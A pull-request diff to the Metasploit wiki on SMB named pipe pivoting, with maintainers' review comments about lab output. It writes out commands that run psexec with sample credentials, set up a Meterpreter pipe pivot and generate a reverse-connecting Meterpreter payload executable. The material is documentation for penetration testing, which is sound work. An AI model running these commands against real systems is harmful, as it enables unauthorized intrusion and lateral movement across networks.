docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md

```diff
@@ -210,11 +214,42 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
 [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
 msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
 ```
-# Pivoting External Tools
-## portfwd
+
+## SMB Named Pipe Pivoting in Meterpreter
+
+The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality.
+
+First open a Windows Meterpreter session to the pivot machine:
+
+```
+use exploit/windows/smb/psexec
+run smb://admin:password123@169.254.16.221
+```
+
+Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
+
+```
+meterpreter > pivot add -t pipe -l 169.254.16.221 -n msfpipe -a x64 -p windows
+[+] Successfully created pipe pivot.
+meterpreter >
+```
+
+Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine:
+
+```
+msf6 > use windows/x64/meterpreter/reverse_named_pipe
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -o named_pipe_example.exe -f exe pipehost=169.254.16.221 pipename=msfpipe
+[*] Writing 7168 bytes to named_pipe_example.exe...
+```
+
+After running the payload on the final Windows 2019 target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
```

Comment:
cc @gwillcox-r7 - I aligned with the network topology described in the intro, but potentially worth a double check from yourself that this meets up with expectations 😄

I was thinking it'd be nice to add the output of the `sessions` command as it shows really nicely `via pivot (x.y.x.z ...)` in the table output but I didn't have the cycles to mock it out for your test lab, is this a lab you've got sitting around still? Potentially we can grab it from your real setup 👀

Reply:
@adfoster-r7 Unfortunately don't have the environment alive anymore due to some issue that corrupted my Windows 2019 install and prevented it from booting however we can probably set something similar up again if needs be.